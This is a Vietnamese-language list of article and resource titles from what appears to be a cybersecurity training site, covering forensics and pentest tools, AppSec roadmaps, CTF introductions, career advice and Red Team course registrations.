Top 10 Công Cụ Digital Forensics Miễn Phí (2025) – Vũ Khí Không Thể Thiếu Cho DFIR

Top 10 Công Cụ Pwnable Mạnh Mẽ Nhất 2025 - Vũ Khí Của Hacker Mũ Trắng

Application Security: Khởi đầu, Thu Nhập Hấp Dẫn, RoadMap 2025

Application Security: Khởi Đầu Hành Trình Từ Pentester Đến Chuyên Gia Bảo Mật Ứng Dụng

Tương lai nghề An ninh mạng: Liệu AI có thể thay thế hoàn toàn?

Tương lai nghề An ninh mạng: Liệu AI có thể thay thế hoàn toàn?

Tổng quan về Các công cụ SAST trong AppSec 2025

RoadMap AppSec: Lộ Trình Từ Zero Đến Hero Của Chuyên Gia Bảo Mật Ứng Dụng

Chuyển Ngành Sang An Ninh Mạng: Hành Trình, Thách Thức & Giải Pháp Thực Tế

Làm An toàn Thông tin 2025 mới ra trường liệu có nhanh đạt mức lương $1,000?

Cơ hội việc làm và thực tập trong ngành An ninh mạng 2025

Threat Hunting là gì? Khác gì so với Threat Intelligence, SOC?

Lập Trình Quan Trọng Ra Sao Trong An Toàn Thông Tin?

10 Thuật Ngữ Quan Trọng Về An Toàn Thông Tin Mà Người Mới Cần Biết

CTF là gì? Hướng dẫn CTF cho người mới (Pwn, Forensics, Crypto cơ bản)

Giải Mã CTF – Từ Sân Chơi “Capture The Flag” Đến Hành Trình Trở Thành Hacker Mũ Trắng Chuyên Nghiệp

Hướng Dẫn Lộ Trình Pentest Cho Lập Trình Viên: Roadmap Từ Developer Sang Pentester

Đồ án Pentest Web bắt kịp xu hướng 2025

Lộ Trình Học An Toàn Thông Tin 2025: Từ Tân Binh Đến Pro Hacker Trong 12 Tháng

BE BLUE OR NOT BE BLUE: WEBINAR Đặc Biệt Về Blue Team Security 2025

AWS Cloud Security Mindmap

Học bổng CyberJutsu 2024

Đăng ký học thử Red Team Operation 2024

(Slide) Tổng quan Red Team Operations

(Form đăng ký) Học thử Pentest miễn phí: Red Team Operation Basics

Học Pentest miễn phí: Access Control Vulnerabilities (Video)

Học Pentest miễn phí: Access Control Vulnerabilities (Video)

(Form đăng ký) Học thử Pentest miễn phí: Access Control Vulnerabilities (20/04/2023)

Access Control Vulnerabilities: 03 case study từ Apple

Access Control Vulnerabilities: 03 case study từ Apple

05 nơi làm việc Pentester luôn được săn đón

(Infographic) Nhu cầu tuyển dụng Penetration Tester